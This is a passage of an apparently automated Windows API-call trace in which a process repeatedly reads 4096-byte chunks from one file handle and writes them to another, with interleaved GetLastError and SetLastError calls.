lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.948] GetLastError () returned 0x0 [0096.948] SetLastError (dwErrCode=0x0) [0096.948] GetLastError () returned 0x0 [0096.948] SetLastError (dwErrCode=0x0) [0096.948] GetLastError () returned 0x0 [0096.948] SetLastError (dwErrCode=0x0) [0096.948] GetLastError () returned 0x0 [0096.948] SetLastError (dwErrCode=0x0) [0096.949] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.949] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.949] GetLastError () returned 0x0 [0096.949] SetLastError (dwErrCode=0x0) [0096.949] GetLastError () returned 0x0 [0096.949] SetLastError (dwErrCode=0x0) [0096.949] GetLastError () returned 0x0 [0096.949] SetLastError (dwErrCode=0x0) [0096.949] GetLastError () returned 0x0 [0096.949] SetLastError (dwErrCode=0x0) [0096.949] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.950] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.950] GetLastError () returned 0x0 [0096.950] SetLastError (dwErrCode=0x0) [0096.950] GetLastError () returned 0x0 [0096.950] SetLastError (dwErrCode=0x0) [0096.950] GetLastError () returned 0x0 [0096.950] SetLastError (dwErrCode=0x0) [0096.950] GetLastError () returned 0x0 [0096.950] SetLastError (dwErrCode=0x0) [0096.950] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.952] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.952] GetLastError () returned 0x0 [0096.952] SetLastError (dwErrCode=0x0) [0096.952] GetLastError () returned 0x0 [0096.952] SetLastError (dwErrCode=0x0) [0096.952] GetLastError () returned 0x0 [0096.952] SetLastError (dwErrCode=0x0) [0096.952] GetLastError () returned 0x0 [0096.952] SetLastError (dwErrCode=0x0) [0096.953] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.953] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.953] GetLastError () returned 0x0 [0096.953] SetLastError (dwErrCode=0x0) [0096.953] GetLastError () returned 0x0 [0096.953] SetLastError (dwErrCode=0x0) [0096.953] GetLastError () returned 0x0 [0096.953] SetLastError (dwErrCode=0x0) [0096.953] GetLastError () returned 0x0 [0096.953] SetLastError (dwErrCode=0x0) [0096.954] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.954] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.954] GetLastError () returned 0x0 [0096.954] SetLastError (dwErrCode=0x0) [0096.954] GetLastError () returned 0x0 [0096.954] SetLastError (dwErrCode=0x0) [0096.954] GetLastError () returned 0x0 [0096.954] SetLastError (dwErrCode=0x0) [0096.954] GetLastError () returned 0x0 [0096.954] SetLastError (dwErrCode=0x0) [0096.954] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.955] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.955] GetLastError () returned 0x0 [0096.955] SetLastError (dwErrCode=0x0) [0096.955] GetLastError () returned 0x0 [0096.955] SetLastError (dwErrCode=0x0) [0096.955] GetLastError () returned 0x0 [0096.955] SetLastError (dwErrCode=0x0) [0096.955] GetLastError () returned 0x0 [0096.955] SetLastError (dwErrCode=0x0) [0096.955] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.955] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.956] GetLastError () returned 0x0 [0096.956] SetLastError (dwErrCode=0x0) [0096.956] GetLastError () returned 0x0 [0096.956] SetLastError (dwErrCode=0x0) [0096.956] GetLastError () returned 0x0 [0096.956] SetLastError (dwErrCode=0x0) [0096.956] GetLastError () returned 0x0 [0096.956] SetLastError (dwErrCode=0x0) [0096.956] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.956] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.957] GetLastError () returned 0x0 [0096.957] SetLastError (dwErrCode=0x0) [0096.957] GetLastError () returned 0x0 [0096.957] SetLastError (dwErrCode=0x0) [0096.957] GetLastError () returned 0x0 [0096.957] SetLastError (dwErrCode=0x0) [0096.957] GetLastError () returned 0x0 [0096.957] SetLastError (dwErrCode=0x0) [0096.957] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.957] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.957] GetLastError () returned 0x0 [0096.957] SetLastError (dwErrCode=0x0) [0096.957] GetLastError () returned 0x0 [0096.958] SetLastError (dwErrCode=0x0) [0096.958] GetLastError () returned 0x0 [0096.958] SetLastError (dwErrCode=0x0) [0096.958] GetLastError () returned 0x0 [0096.958] SetLastError (dwErrCode=0x0) [0096.958] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.958] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.958] GetLastError () returned 0x0 [0096.958] SetLastError (dwErrCode=0x0) [0096.958] GetLastError () returned 0x0 [0096.958] SetLastError (dwErrCode=0x0) [0096.958] GetLastError () returned 0x0 [0096.959] SetLastError (dwErrCode=0x0) [0096.959] GetLastError () returned 0x0 [0096.959] SetLastError (dwErrCode=0x0) [0096.959] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.959] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.959] GetLastError () returned 0x0 [0096.959] SetLastError (dwErrCode=0x0) [0096.959] GetLastError () returned 0x0 [0096.959] SetLastError (dwErrCode=0x0) [0096.959] GetLastError () returned 0x0 [0096.959] SetLastError (dwErrCode=0x0) [0096.959] GetLastError () returned 0x0 [0096.959] SetLastError (dwErrCode=0x0) [0096.960] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.960] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.960] GetLastError () returned 0x0 [0096.960] SetLastError (dwErrCode=0x0) [0096.960] GetLastError () returned 0x0 [0096.960] SetLastError (dwErrCode=0x0) [0096.960] GetLastError () returned 0x0 [0096.960] SetLastError (dwErrCode=0x0) [0096.960] GetLastError () returned 0x0 [0096.960] SetLastError (dwErrCode=0x0) [0096.960] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.961] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.961] GetLastError () returned 0x0 [0096.961] SetLastError (dwErrCode=0x0) [0096.961] GetLastError () returned 0x0 [0096.961] SetLastError (dwErrCode=0x0) [0096.961] GetLastError () returned 0x0 [0096.961] SetLastError (dwErrCode=0x0) [0096.961] SetLastError (dwErrCode=0x0) [0096.961] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.961] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.962] SetLastError (dwErrCode=0x0) [0096.962] SetLastError (dwErrCode=0x0) [0096.962] SetLastError (dwErrCode=0x0) [0096.962] SetLastError (dwErrCode=0x0) [0096.962] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.962] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.962] SetLastError (dwErrCode=0x0) [0096.962] SetLastError (dwErrCode=0x0) [0096.962] SetLastError (dwErrCode=0x0) [0096.962] SetLastError (dwErrCode=0x0) [0096.962] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.962] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.962] SetLastError (dwErrCode=0x0) [0096.962] SetLastError (dwErrCode=0x0) [0096.962] SetLastError (dwErrCode=0x0) [0096.962] SetLastError (dwErrCode=0x0) [0096.962] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.963] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.963] SetLastError (dwErrCode=0x0) [0096.963] SetLastError (dwErrCode=0x0) [0096.963] SetLastError (dwErrCode=0x0) [0096.963] SetLastError (dwErrCode=0x0) [0096.963] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.963] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.963] SetLastError (dwErrCode=0x0) [0096.963] SetLastError (dwErrCode=0x0) [0096.963] SetLastError (dwErrCode=0x0) [0096.963] SetLastError (dwErrCode=0x0) [0096.963] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.963] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.964] SetLastError (dwErrCode=0x0) [0096.964] SetLastError (dwErrCode=0x0) [0096.964] SetLastError (dwErrCode=0x0) [0096.964] SetLastError (dwErrCode=0x0) [0096.964] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.964] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.964] SetLastError (dwErrCode=0x0) [0096.964] SetLastError (dwErrCode=0x0) [0096.964] SetLastError (dwErrCode=0x0) [0096.964] SetLastError (dwErrCode=0x0) [0096.964] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.964] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.965] SetLastError (dwErrCode=0x0) [0096.965] SetLastError (dwErrCode=0x0) [0096.965] SetLastError (dwErrCode=0x0) [0096.965] SetLastError (dwErrCode=0x0) [0096.965] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.965] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.965] SetLastError (dwErrCode=0x0) [0096.965] SetLastError (dwErrCode=0x0) [0096.965] SetLastError (dwErrCode=0x0) [0096.965] SetLastError (dwErrCode=0x0) [0096.965] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.965] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.965] SetLastError (dwErrCode=0x0) [0096.965] SetLastError (dwErrCode=0x0) [0096.966] SetLastError (dwErrCode=0x0) [0096.966] SetLastError (dwErrCode=0x0) [0096.966] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.966] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.966] SetLastError (dwErrCode=0x0) [0096.966] SetLastError (dwErrCode=0x0) [0096.966] SetLastError (dwErrCode=0x0) [0096.966] SetLastError (dwErrCode=0x0) [0096.966] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.966] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.966] SetLastError (dwErrCode=0x0) [0096.966] SetLastError (dwErrCode=0x0) [0096.966] SetLastError (dwErrCode=0x0) [0096.966] SetLastError (dwErrCode=0x0) [0096.966] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.966] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.967] SetLastError (dwErrCode=0x0) [0096.967] SetLastError (dwErrCode=0x0) [0096.967] SetLastError (dwErrCode=0x0) [0096.967] SetLastError (dwErrCode=0x0) [0096.967] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.967] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.967] SetLastError (dwErrCode=0x0) [0096.967] SetLastError (dwErrCode=0x0) [0096.967] SetLastError (dwErrCode=0x0) [0096.967] SetLastError (dwErrCode=0x0) [0096.967] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.967] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.967] SetLastError (dwErrCode=0x0) [0096.968] SetLastError (dwErrCode=0x0) [0096.968] SetLastError (dwErrCode=0x0) [0096.968] SetLastError (dwErrCode=0x0) [0096.968] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.968] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.968] SetLastError (dwErrCode=0x0) [0096.968] SetLastError (dwErrCode=0x0) [0096.968] SetLastError (dwErrCode=0x0) [0096.968] SetLastError (dwErrCode=0x0) [0096.968] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.968] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.968] SetLastError (dwErrCode=0x0) [0096.968] SetLastError (dwErrCode=0x0) [0096.968] SetLastError (dwErrCode=0x0) [0096.968] SetLastError (dwErrCode=0x0) [0097.148] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.148] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.148] SetLastError (dwErrCode=0x0) [0097.148] SetLastError (dwErrCode=0x0) [0097.148] SetLastError (dwErrCode=0x0) [0097.148] SetLastError (dwErrCode=0x0) [0097.148] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.148] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.148] SetLastError (dwErrCode=0x0) [0097.148] SetLastError (dwErrCode=0x0) [0097.148] SetLastError (dwErrCode=0x0) [0097.149] SetLastError (dwErrCode=0x0) [0097.149] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.149] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.149] SetLastError (dwErrCode=0x0) [0097.149] SetLastError (dwErrCode=0x0) [0097.149] SetLastError (dwErrCode=0x0) [0097.149] SetLastError (dwErrCode=0x0) [0097.149] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.149] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.149] SetLastError (dwErrCode=0x0) [0097.149] SetLastError (dwErrCode=0x0) [0097.149] SetLastError (dwErrCode=0x0) [0097.149] SetLastError (dwErrCode=0x0) [0097.149] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.150] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.151] SetLastError (dwErrCode=0x0) [0097.151] SetLastError (dwErrCode=0x0) [0097.151] SetLastError (dwErrCode=0x0) [0097.151] SetLastError (dwErrCode=0x0) [0097.151] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.151] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, 